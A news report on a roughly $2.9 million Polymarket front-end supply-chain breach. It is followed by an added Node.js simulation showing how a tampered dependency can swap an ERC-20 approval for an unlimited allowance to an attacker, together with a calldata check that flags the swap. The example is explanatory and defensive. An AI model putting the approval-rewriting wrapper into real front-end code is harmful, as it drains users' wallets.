Polymarket, one of the largest decentralized prediction-market platforms, said attackers drained roughly $2.9 million from a small number of users after compromising one of its third-party vendors and injecting malicious code into its website, an incident the company says it has contained and for which it has pledged full refunds.

The platform disclosed the breach on Thursday, explaining that a third-party vendor it relies on had been compromised, allowing attackers to insert a malicious script into the front end of its website for some users. When affected users connected their wallets, the script is said to have tricked them into approving or signing transactions that drained their funds. Polymarket said it had contained the incident, removed the affected dependency, and was contacting impacted users to reimburse them in full.

Crucially, the attack did not break the platform's underlying blockchain contracts. Security researchers characterized it as a supply-chain compromise rather than a smart-contract exploit: the on-chain systems continued to operate as designed, while the weak point was the code delivered to users' browsers. The distinction matters because a front-end attack needs no contract bug. A wallet signs whatever calldata the page hands it, so a script that controls the page can present one transaction in the interface while passing a different one to the wallet, and the intact contracts then move funds exactly as that signed transaction dictates.

On-chain investigators who first flagged the incident estimated that around $2.94 million was taken from at least 11 wallets, with some analyses putting the number of affected accounts at fewer than 15. The targeted asset was the platform's dollar-pegged collateral token, used across its markets and backed by a major stablecoin. After draining the funds, the attacker bridged them from one blockchain network to another and converted the proceeds into roughly 1,893 ETH, consolidating the haul into a single address that investigators continued to track. Because the stolen funds remain traceable on-chain, investigators have not ruled out recovery.

It is not the platform's first security scare this year. In a separate episode weeks earlier, several hundred thousand dollars were drained from an internal operations wallet tied to rewards payouts, though user funds were not affected at the time. Earlier phishing attempts have also cost some users. The recurring theme across these events is that the protocol itself has held up, while the surrounding infrastructure, including vendor relationships and front-end components, has been the point of failure, a pattern the latest breach repeats.

The speed of the response drew attention: the company acknowledged the compromise within about 15 minutes of the first public report. Polymarket did not name the compromised vendor and declined to comment further. Its commitment to reimburse affected users, alongside transparent communication, may limit reputational damage, though analysts noted that two infrastructure-related incidents in under two months raise questions about how rigorously the platform vets external partners and detects tampering in the code it ships as it scales.

The episode lands amid a broader run of crypto-security breaches. Industry trackers have flagged the period as one of the most active quarters for incidents on record by count, with supply-chain and key-compromise attacks featuring heavily. For users, the takeaway echoed across analyses was familiar: be cautious about which sites you connect a wallet to, verify the address in the browser bar, and read the transaction prompt itself rather than trusting the page, since a compromised front end can make a malicious request look exactly like the legitimate one it replaced. The wallet's signing prompt is the one view the page does not control, so it is the place to check the spender, the amount and the contract being called.
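To make the mechanism behind the paragraphs above concrete, here is an added example. It is not Polymarket's code and makes no claim about what the actual injected script did; it is a Node.js simulation in which a compromised front-end dependency wraps the wallet provider and rewrites an ERC-20 `approve` call before the wallet is asked to sign it, alongside a calldata check of the kind a wallet or dapp could run on the prompt instead of trusting the page. The token, exchange, user and attacker addresses are constructed placeholders; the function selectors for `approve(address,uint256)` and `transfer(address,uint256)` are the standard ERC-20 ones.

```javascript
// Added illustration, not Polymarket's code: a compromised dependency rewriting an
// ERC-20 approval, and a calldata check that would flag it before signing.
// Runs offline under Node.js; every address below is a constructed placeholder.

const SELECTORS = {
  "0x095ea7b3": "approve(address,uint256)",   // standard ERC-20 selectors
  "0xa9059cbb": "transfer(address,uint256)",
};
const MAX_UINT256 = (1n << 256n) - 1n;

const TOKEN = "0x" + "11".repeat(20);      // constructed: collateral token contract
const EXCHANGE = "0x" + "22".repeat(20);   // constructed: legitimate spender
const USER = "0x" + "33".repeat(20);       // constructed: victim wallet
const ATTACKER = "0x" + "de".repeat(20);   // constructed: attacker-controlled spender

// ABI-encode an ERC-20 approve/transfer: 4-byte selector, 32-byte address word, 32-byte amount.
function encodeErc20Call(fn, addr, amount) {
  const selector = Object.keys(SELECTORS).find((k) => SELECTORS[k] === fn);
  if (!selector) throw new Error("unsupported function " + fn);
  const pad32 = (hex) => hex.replace(/^0x/, "").padStart(64, "0");
  return selector + pad32(addr.toLowerCase()) + pad32(BigInt(amount).toString(16));
}

// Decode the same layout; returns null for anything that is not a well-formed approve/transfer.
function decodeErc20Call(data) {
  if (typeof data !== "string" || !/^0x[0-9a-f]{136}$/i.test(data)) return null;
  const fn = SELECTORS[data.slice(0, 10).toLowerCase()];
  if (!fn) return null;
  const addrWord = data.slice(10, 74).toLowerCase();
  if (!/^0{24}/.test(addrWord)) return null; // address word must be zero-padded
  return { fn, address: "0x" + addrWord.slice(24), amount: BigInt("0x" + data.slice(74, 138)) };
}

// What a tampered third-party script can do: wrap the injected provider so the page
// still shows "approve 1,000 to the exchange" while the wallet receives a different call.
function maliciousProviderWrapper(provider) {
  return {
    request(args) {
      if (args.method !== "eth_sendTransaction") return provider.request(args);
      const tx = { ...args.params[0] };
      const call = decodeErc20Call(tx.data);
      if (call && call.fn.startsWith("approve")) {
        tx.data = encodeErc20Call("approve(address,uint256)", ATTACKER, MAX_UINT256);
      }
      return provider.request({ ...args, params: [tx] });
    },
  };
}

// The check: decode what the wallet is actually being asked to sign and compare it
// against what the user should expect, rather than trusting the page's own UI.
function inspectErc20Tx(tx, trustedSpenders) {
  const call = decodeErc20Call(tx.data);
  if (!call) return { call: null, findings: ["calldata is not a recognised ERC-20 approve/transfer"] };
  const trusted = new Set(trustedSpenders.map((a) => a.toLowerCase()));
  const findings = [];
  const name = call.fn.split("(")[0];
  if (!trusted.has(call.address)) findings.push(`${name} target ${call.address} is not an allow-listed contract`);
  if (name === "approve" && call.amount === MAX_UINT256) findings.push("unlimited allowance requested");
  return { call, findings };
}

// End-to-end: the dapp builds a bounded approval, the compromised wrapper swaps it,
// and the inspector flags what the wallet would otherwise sign.
function runScenario() {
  const signed = [];                                                  // what reaches the wallet
  const wallet = { request: (args) => { signed.push(args.params[0]); return "0x" + "ab".repeat(32); } };
  const provider = maliciousProviderWrapper(wallet);                  // dependency is compromised
  const intended = {
    from: USER,
    to: TOKEN,
    data: encodeErc20Call("approve(address,uint256)", EXCHANGE, 1000000000n), // 1,000 units at 6 decimals
  };
  provider.request({ method: "eth_sendTransaction", params: [intended] });
  const report = inspectErc20Tx(signed[0], [EXCHANGE]);
  return { intended: decodeErc20Call(intended.data), signed: report.call, findings: report.findings };
}

console.log(JSON.stringify(runScenario(), (k, v) => (typeof v === "bigint" ? v.toString() : v), 2));
```

The check deliberately looks only at the decoded calldata and an allow-list of spenders, which is exactly the information a wallet prompt exposes; nothing the page renders is consulted. A real deployment would also pin the injected provider before any third-party script loads and verify that vendor scripts match expected hashes, but the point here is that the transaction the wallet signs, not the one the page describes, is the only thing that moves funds.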